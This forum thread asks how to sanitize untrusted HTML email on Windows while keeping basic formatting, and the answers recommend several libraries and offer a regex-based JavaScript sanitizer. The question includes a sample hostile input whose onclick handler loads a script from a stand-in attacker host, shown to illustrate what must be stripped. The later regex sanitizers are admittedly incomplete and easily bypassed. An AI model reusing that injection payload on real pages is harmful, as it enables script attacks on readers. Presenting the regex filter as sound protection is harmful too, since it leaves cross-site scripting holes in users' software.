
What can I use to sanitize received HTML while retaining basic formatting?

Posted by: admin November 30, 2017


This is a common problem, I’m hoping it’s been thoroughly solved for me.

In a system I’m doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn’t have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. 🙂

The goal is to end up with something we’d feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.

We recognize that some of this may well muck up the display of the text; that’s okay.

We’ll be sanitizing the HTML on receipt and storing the sanitized version (don’t worry about the storage part — SQL injection and the like — we’ve got that bit covered).

The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.

What I’ve found so far:

  • The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
  • Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing…).
  • The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn’t whitelist. The agility pack looks really great, but I’d be relying on my own whitelist rather than reusing a wheel that someone’s already invented, so that’s a ding against it.
  • The Microsoft Anti-XSS library

What would you recommend for this task? One of the above? Something else?

For example, we want to remove things like:

  • script elements
  • link, img, and such elements that reach out to external resources (probably replace img with the text “[image removed]” or some such)
  • embed, object, applet, audio, video, and other tags that try to create objects
  • onclick and similar DOM0 event handler script code
  • hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
  • __________ (the 722 things I haven’t thought of that are the reason I’m looking to leverage something that already exists)

So for instance, this HTML:

<!DOCTYPE html>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s); })();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>

would become

<!DOCTYPE html>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]

(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we’ll need to strip out.)
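To make the shape of that transformation concrete, here is a minimal, hypothetical sketch of a whitelist pass (a hand-rolled tag scanner; the allowed-tag set and the "[image removed]" placeholder are just this example's choices, and a real implementation should use a robust parser such as the HTML Agility Pack rather than a regex scan):

```javascript
// Minimal whitelist-based sanitizer sketch: keeps a few formatting tags
// (stripped of all attributes), replaces img with a placeholder text, and
// drops every other tag entirely.
function sanitize(html) {
  var allowed = { b: true, i: true, em: true, strong: true, p: true, br: true };
  return html.replace(/<[^>]*>/g, function (tag) {
    // Pull out an optional "/" and the tag name from the matched token.
    var m = /^<\s*(\/?)\s*([a-zA-Z][a-zA-Z0-9]*)/.exec(tag);
    if (!m) return "";                       // malformed or non-element token: drop it
    var closing = m[1] === "/";
    var name = m[2].toLowerCase();
    if (name === "img") return closing ? "" : "[image removed]";
    if (allowed[name]) return "<" + (closing ? "/" : "") + name + ">"; // strip attributes
    return "";                               // everything else (script, link, ...) is dropped
  });
}

var input = '<p onclick="evil()"><strong>Hi there!</strong> ' +
            '<img src="http://evil.example.com/xparent.gif"></p>';
console.log(sanitize(input));
// -> <p><strong>Hi there!</strong> [image removed]</p>
```

Note that this sketch drops script tags but leaves the text between them, keeps no attributes at all, and doesn't handle comments, CDATA, or malformed nesting; those gaps are exactly the "722 things" that make a maintained library preferable to rolling your own.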


This is an older, but still relevant question.

We are using the HtmlSanitizer .NET library, which is also available on NuGet.


I suspect you would need a parser that can generate an XML/DOM tree so that you can apply filters to it and produce what you are looking for.

See whether the HtmlTidy, Mozilla, or HtmlCleaner parsers can help. HtmlCleaner has a lot of configurable options which you might also want to look at, specifically the transform section, which allows you to skip the tags you don't require.


I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.


I would suggest another approach. If you control the method by which the HTML is viewed, you can remove the threats by using an HTML renderer that doesn't have an ECMAScript engine or any XSS capability. I see you are going to use the built-in WebBrowser object; rightly, you want to produce HTML that cannot be used to attack your users.

I recommend looking for a basic HTML display engine, one that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the JavaScript would then simply be ignored.

This does have another problem, though: you would need to ensure that the viewer you are using isn't susceptible to other types of attacks.


Interesting problem. I spent some time on it, because there are a lot of things we want to remove from user input, and even if I made a long list of things to remove, HTML can evolve later and my list would end up with holes.
Nonetheless, I want users to be able to input some simple things like bold, italic, paragraphs... pretty simple.
No doubt the list of allowed things is shorter, and if HTML changes later, that won't make holes in my list unless HTML stops supporting these simple things.
So, thinking the other way around, state only what you allow. With great pain, because I'm not an expert on regex (so please, regex people, correct or improve this), I coded this expression, and it was working for me even before HTML5 arrived:

(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^<>]*>

(b|i|p|br) <- this is the list of allowed tags, feel free to add some.

This is a starting point, and that's why some regex people should improve it to also remove the attributes, like onclick.

If I do this instead, requiring allowed tags to carry no attributes at all:

(?!<[/]?(b|i|p|br)>)<[^<>]*>

then tags with onclick or other attributes will be removed, but the corresponding closing tags will remain; and after all, we don't want those tags removed, we just want to remove the tag attributes.

Maybe a second regex pass with the attribute-stripping part:

(?!<[^<>\s]+)\s[^</>]+(?=[/>])

Am I right? Can this be composed into a single pass?

We still have no relation between tags (opening/closing); no big deal so far.
Can the attribute removal be written to remove everything not on a whitelist? (Possibly, yes.)

One last problem: when removing tags like script, the content remains. That's desirable when removing font, but not script. Well, we can do a first pass with

<(script|object|embed)[^>]*>.*</\1>

which will remove certain tags and their content. But it's a blacklist, meaning you have to keep an eye on it in case HTML changes.

Note: all of these with the “gi” flags.


I joined all of the above in this function:

String.prototype.sanitizeHTML=function (white,black) {
   if (!white) white="b|i|p|br";//allowed tags
   if (!black) black="script|object|embed";//completely remove these tags and their content
   var e=new RegExp("(<("+black+")[^>]*>.*</\\2>|(?!<[/]?("+white+")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
   return this.replace(e,"");
};

  • black list: completely remove tag and content
  • white list: retain tags
  • other tags are removed, but their content is retained
  • all attributes of the remaining whitelisted tags are removed

There is still room for a whitelist of attributes (not implemented above), because if I want to preserve img then the src must stay... and what about tracking images?
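One way to sketch that per-tag attribute whitelist (a hypothetical extension, not part of the function above; the allowed-attribute map is just an example) is a pass that rebuilds each opening tag, keeping only approved attributes:

```javascript
// Sketch of a per-tag attribute whitelist: rebuilds each opening tag,
// keeping only the attributes listed for that tag name and dropping the rest.
// (Illustrative only; it handles only quoted attribute values, and regex-based
// attribute parsing is fragile in general.)
function whitelistAttributes(html, allowed) {
  return html.replace(/<\s*([a-zA-Z][a-zA-Z0-9]*)((?:\s+[^<>]*?)?)\s*(\/?)>/g,
    function (whole, name, attrs, selfClose) {
      var keep = allowed[name.toLowerCase()] || [];
      var out = "<" + name.toLowerCase();
      var attrRe = /([a-zA-Z-]+)\s*=\s*("[^"]*"|'[^']*')/g;
      var m;
      while ((m = attrRe.exec(attrs)) !== null) {
        if (keep.indexOf(m[1].toLowerCase()) !== -1) {
          out += " " + m[1].toLowerCase() + "=" + m[2];
        }
      }
      return out + (selfClose ? "/" : "") + ">";
    });
}

console.log(whitelistAttributes(
  '<img src="a.gif" onerror="evil()"><p onclick="evil()">x</p>',
  { img: ["src", "alt"] }
));
// -> <img src="a.gif"><p>x</p>
```

Note that even a legitimate src can be a tracking image, as the question points out, so in this setting you may want to leave img out of the attribute whitelist entirely and replace the element with a placeholder instead.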